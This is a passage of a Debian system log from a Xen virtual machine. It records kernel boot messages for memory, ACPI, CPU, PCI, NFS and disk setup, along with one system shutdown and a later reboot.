933May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
934May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
935May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
936May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
937May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
938May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
939May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
940May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
941May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
942May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
943May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
944May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
945May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
946May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
947May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
948May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
949May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
950May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
951May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
952May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
953May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
954May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
955May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
956May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
957May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
958May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
959May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
960May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
961May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
962May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
963May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
964May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
965May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
966May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
967May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
968May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
969May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
970May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
971May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
972May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
973May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
974May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
975May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
976May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
977May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
978May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
979May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
980May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
981May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
982May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
983May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
984May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
985May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
986May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
987May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
988May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
989May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
990May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
991May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
992May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
993May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
994May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
995May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
996May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
997May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
998May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
999May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
1000May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
1001May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
1002May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
1003Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1004Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
1005Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1006Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1007Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1008Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1009Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
1010Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
1011Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
1012Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
1013Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1014Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1015Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1016Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1017Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
1018Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1019Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
1020Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
1021Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1022Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
1023Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
1024Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1025Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1026Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1027Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1028Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1029Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1030Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1031Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1032Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1033Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1034Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
1035Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
1036Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
1037Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
1038Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
1039Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
1040Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1041Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1042Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1043Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
1044Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1045Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1046Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1047Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
1048Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1049Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1050Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
1051Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
1052Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
1053Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1054Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
1055Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1056Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1057Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
1058Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
1059Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
1060Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1061Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1062Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1063Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1064Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1065Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1066Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1067Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1068Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1069Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1070Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1071Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1072Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1073Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1074Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1075Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1076Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1077Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1078Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1079Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
1080Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
1081Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1082Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1083Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
1084Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1085Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
1086Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1087Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1088Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1089Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
1090Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1091Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1092Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
1093Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1094Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1095Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
1096Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
1097Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1098Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
1099Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
1100Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
1101Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
1102Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
1103Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
1104Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1105Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1106Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1107Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1108Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1109Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
1110Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
1111Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
1112Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
1113Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1114Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
1115Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
1116Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1117Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1118Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1119Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1120Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1121Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1122Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1123Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1124Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1125Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
1126Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1127Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1128Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
1129Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
1130Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
1131Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
1132Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
1133Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1134Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
1135Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
1136Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
1137Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
1138Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
1139Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
1140Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
1141Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
1142Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
1143Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
1144Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
1145Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
1146Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
1147Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
1148Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
1149Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1150Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
1151Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1152Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1153Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1154Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1155Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1156Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1157Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
1158Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
1159Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1160Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1161Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1162Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
1163Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
1164Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
1165Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
1166Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
1167Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1168Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1169Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
1170Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1171Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1172Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1173Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
1174Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
1175Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
1176Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
1177Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
1178Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
1179Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
1180Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1181Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1182Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1183Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
1184Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
1185Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
1186Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
1187Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1188Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
1189Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1190Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
1191Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
1192Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1193Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
1194Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
1195Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
1196Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
1197Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1198Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
1199Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
1200Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1201Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1202Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1203Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1204Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1205Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
1206Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
1207Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
1208Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1209Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1210Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1211Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1212Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
1213Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1214Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1215Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1216Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
1217Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
1218Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
